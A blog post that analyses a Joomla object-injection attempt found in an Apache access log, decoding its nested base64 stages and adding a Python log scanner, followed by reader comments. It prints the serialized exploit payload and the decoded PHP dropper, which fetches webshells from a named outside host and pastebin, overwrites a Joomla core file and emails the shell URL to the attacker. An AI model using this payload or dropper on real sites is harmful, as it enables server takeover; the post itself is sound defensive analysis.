Hmmm…what do we have here?

[Screenshot: Apache access log overview] As you can see in this screenshot of an Apache access log, something is a bit off: the individual lines are peppered with wide blocks in the middle. They stand out like sore thumbs, don't they?

Let’s take a closer look.


1×2.1×7.1×9.1×2 - - [11/May/2016:07:52:42 +0000] "GET /login HTTP/1.0" 200 3138 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:3738:\"eval(base64_decode('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'));JFactory::getConfig();exit\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\xfd\xfd\xfd" vhost=ala.devcloud.acquia-sites.com host=www.website.org hosting_site=ala pid=1219 request_time=158579 request_id="v-578582fe-174d-11e6-a036-22000a1e875f"

Someone is sending a large block of data to my server, stuffed into the User-Agent field (the last quoted field of the line). It is a serialized PHP object with a base64 blob inside. Let's decode that blob.

Using <?php echo base64_decode('allthatcrap'); ?> I get:

$check = $_SERVER['DOCUMENT_ROOT'] . "/media/xxxx.php" ;
$fp=fopen("$check","w+");
fwrite($fp,base64_decode('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'));

So, dropping a file called xxxx.php into the media directory, are we? And its contents are yet another base64 blob.

Let’s decode the rest of the package.


function http_get($url){
    $im = curl_init($url);
    curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($im, CURLOPT_HEADER, 0);
    return curl_exec($im);
    curl_close($im);
}
$check = $_SERVER['DOCUMENT_ROOT'] . "/media/css.php" ;
$text = http_get('http://mrtg.ui.phinma.edu.ph/components/joomla.txt');
$open = fopen($check, 'w');
fwrite($open, $text);
fclose($open);
if(file_exists($check)){
    echo $check."";
}else
    echo "not exits";
echo "done .\n " ;
$check2 = $_SERVER['DOCUMENT_ROOT'] . "/media/jmail.php" ;
$text2 = http_get('http://mrtg.ui.phinma.edu.ph/components/jmailz.txt');
$open2 = fopen($check2, 'w');
fwrite($open2, $text2);
fclose($open2);
if(file_exists($check2)){
    echo $check2."";
}else
    echo "not exits2";
echo "done2 .\n " ;

$check3=$_SERVER['DOCUMENT_ROOT'] . "/H.htm" ;
$text3 = http_get('');
$op3=fopen($check3, 'w');
fwrite($op3,$text3);
fclose($op3);

$check4=$_SERVER['DOCUMENT_ROOT'] . "/media/check.php" ;
$text4 = http_get('http://mrtg.ui.phinma.edu.ph/components/qq.txt');
$op4=fopen($check4, 'w');
fwrite($op4,$text4);
fclose($op4);

$check5=$_SERVER['DOCUMENT_ROOT'] . "//media/jmails.php" ;
$text5 = http_get('http://mrtg.ui.phinma.edu.ph/components/qqz.txt');
$op5=fopen($check5, 'w');
fwrite($op5,$text5);
fclose($op5);

$check6=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/session/session.php" ;
$text6 = http_get('http://pastebin.com/raw/UHAGT887');
$op6=fopen($check6, 'w');
fwrite($op6,$text6);
fclose($op6);

$toz = "";
$subject = 'Jom zzz ' . $_SERVER['SERVER_NAME'];
$header = 'from: Kekkai Sensen <vonReinherzKlaus@SaikounaHibi.com>' . "\r\n";
$message = "Shellz : http://" . $_SERVER['SERVER_NAME'] . "/libraries/joomla/jmail.php?u" . "\r\n" . php_uname() . "\r\n";
$sentmail = @mail($toz, $subject, $message, $header);

@unlink(__FILE__);

Well, well, well... looking to hack a Joomla site, huh? Once the first stage has written xxxx.php, this second stage pulls five more files from a remote host and drops them under the web root (css.php, jmail.php, check.php and jmails.php in /media/, plus a replacement libraries/joomla/session/session.php fetched from pastebin), emails the server name, the shell URL and the php_uname() output to the attacker, and then deletes itself with @unlink(__FILE__).

Anyway... nothing to see here, folks. No Joomla site on this box, so the object was never unserialized. But watch the logs, and if you do run Joomla, check /media/ and libraries/joomla/session/session.php for the files above!
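Watching the logs is easier with a script. The following is an added example (not code from the original post and not the attacker's code) that parses Apache combined-format lines, flags User-Agents that carry a serialized PHP object, a `}__` session-key prefix, or an `eval(base64_decode(` call, and then unwraps the nested base64 stages so the dropped file paths and fetch URLs can be read off directly, the same thing done by hand above. The sample log lines, the RFC 5737 addresses 192.0.2.10 and 192.0.2.77, the host example.invalid and the two stand-in stages are constructed for the example; only the serialized-object skeleton mirrors the logged User-Agent. The 512-byte length threshold is an assumption.

```python
"""Spot PHP object injection in Apache access logs and unwrap nested base64.
Added example; the sample data below is constructed, not taken from a real log."""
import base64
import re

MAX_UA_LEN = 512  # assumption: a User-Agent longer than this deserves a look

# ---- parsing the combined log format ---------------------------------------
FIELD = r'(?:\\.|[^"\\])*'  # one quoted field; mod_log_config writes " as \"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>' + FIELD + r')" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>' + FIELD + r')" "(?P<ua>' + FIELD + r')"')
_SIMPLE = {'n': '\n', 'r': '\r', 't': '\t'}

def apache_unescape(s):
    """Undo Apache's escaping: \\" \\\\ \\n \\r \\t and \\xHH for other bytes."""
    def repl(m):
        esc = m.group(1)
        if len(esc) == 3:               # \xHH
            return chr(int(esc[1:], 16))
        return _SIMPLE.get(esc, esc)    # \" and \\ map to the bare character
    return re.sub(r'\\(x[0-9a-fA-F]{2}|.)', repl, s)

def apache_escape(s):
    """Inverse of apache_unescape; used here only to build the sample lines."""
    out = []
    for ch in s:
        if ch in '"\\':
            out.append('\\' + ch)
        elif ' ' <= ch <= '~':
            out.append(ch)
        else:
            out.append('\\x%02x' % ord(ch))
    return ''.join(out)

# ---- indicators and payload unwrapping -------------------------------------
PHP_OBJECT = re.compile(r'O:\d+:"[A-Za-z_][\w\\]*":\d+:\{')      # serialized PHP object
B64_ARG = re.compile(r"base64_decode\(\s*'([A-Za-z0-9+/=]+)'\s*\)")
DROP_PATH = re.compile(r'\$_SERVER\[\'DOCUMENT_ROOT\'\]\s*\.\s*"([^"]+)"')
FETCH_URL = re.compile(r"""['"](https?://[^'"]+)['"]""")

def decode_stages(text, max_depth=8):
    """Follow every base64_decode('...') argument down through the layers.
    Returns the decoded stages outermost first; stops after max_depth layers."""
    stages, frontier = [], [text]
    for _ in range(max_depth):
        nxt = []
        for blob in frontier:
            for b64 in B64_ARG.findall(blob):
                try:
                    decoded = base64.b64decode(b64, validate=True).decode('utf-8', 'replace')
                except ValueError:      # not real base64, skip it
                    continue
                stages.append(decoded)
                nxt.append(decoded)
        if not nxt:
            break
        frontier = nxt
    return stages

def analyze(line):
    """Return an alert dict for a suspicious line, or None for a clean one."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ua = apache_unescape(m.group('ua'))
    indicators = []
    if len(ua) > MAX_UA_LEN:
        indicators.append('oversized_user_agent')
    if PHP_OBJECT.search(ua):
        indicators.append('php_serialized_object')
    if ua.startswith('}__'):            # object smuggled in as its own session key
        indicators.append('session_injection_prefix')
    if 'eval(base64_decode(' in ua:
        indicators.append('eval_base64')
    if not indicators:
        return None
    stages = decode_stages(ua)
    corpus = '\n'.join([ua] + stages)
    return {
        'ip': m.group('ip'), 'time': m.group('ts'), 'request': m.group('req'),
        'ua_length': len(ua), 'indicators': indicators, 'stages': stages,
        'dropped_files': sorted(set(DROP_PATH.findall(corpus))),  # look for these on disk
        'fetch_urls': sorted(set(FETCH_URL.findall(corpus))),     # block / hunt these
    }

def scan(lines):
    return [a for a in (analyze(l) for l in lines) if a]

# ---- constructed sample data (documentation IPs, .invalid host) -------------
def b64(s):
    return base64.b64encode(s.encode()).decode()

STAGE3 = ("$t = http_get('http://example.invalid/components/joomla.txt');"
          " $f = $_SERVER['DOCUMENT_ROOT'] . \"/media/css.php\"; file_put_contents($f, $t);")
STAGE2 = ("$check = $_SERVER['DOCUMENT_ROOT'] . \"/media/xxxx.php\"; $fp = fopen(\"$check\", \"w+\");"
          " fwrite($fp, base64_decode('" + b64(STAGE3) + "'));")
FEED = "eval(base64_decode('" + b64(STAGE2) + "'));JFactory::getConfig();exit"
MALICIOUS_UA = (('}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}'
                 's:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{'
                 's:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:%d:"%s";'
                 's:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;'
                 's:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}'
                 's:13:"\\0\\0\\0connection";b:1;}' % (len(FEED), FEED)) + '\xf0\xfd\xfd\xfd')

def make_log_line(ip, ua):
    return ('%s - - [11/May/2016:07:52:42 +0000] "GET /login HTTP/1.0" 200 3138 "-" "%s"'
            % (ip, apache_escape(ua)))

SAMPLE_LOG = [
    make_log_line('192.0.2.10', 'Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0'),
    make_log_line('192.0.2.77', MALICIOUS_UA),
]

if __name__ == '__main__':
    for alert in scan(SAMPLE_LOG):
        print(alert['ip'], alert['indicators'])
        print('  drops:  ', alert['dropped_files'])
        print('  fetches:', alert['fetch_urls'])
```

Run it against a real access log with `scan(open('access.log'))`; the `dropped_files` list is what to check on disk and `fetch_urls` is what to block at the egress. Note that the script unwraps `base64_decode` arguments but never evaluates anything, which is the only safe way to read attacker code.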


3 thoughts on "Hmmm…what do we have here?"

  1. c1ph3r says:

    Well, I just got the same log entry on my server.. 🙂 And that twice: once from 192.187.114.11, the second time from 142.54.167.98...
    Btw, the server hosting 'http://mrtg.ui.phinma.edu.ph/components/qq.txt' is in the Philippines 😉

  2. Andrew house says:

    Hey, after following prompts while accessing a government website for legitimate reasons (me trying to keep my six-year-old son safe from his mother), I have ended up here due to an 'unsafe connection'. Can you help me prove my phone keeps getting hacked?

    • michalsen says:

      Andrew, I am sorry, but I am not sure how you wound up on this blog. From your comment I gather you were attempting to connect to a server that had an invalid SSL cert and your browser gave a warning, and then maybe routed to a search query where this blog post was listed? It wouldn’t surprise me to know a government website had an invalid SSL
      With as little information as I have I can not venture to guess what is happening with your phone, but the ‘unsafe connection’ most likely is coming from a server you are attempting to connect to, and not your phone.
      I hope some of this helps.
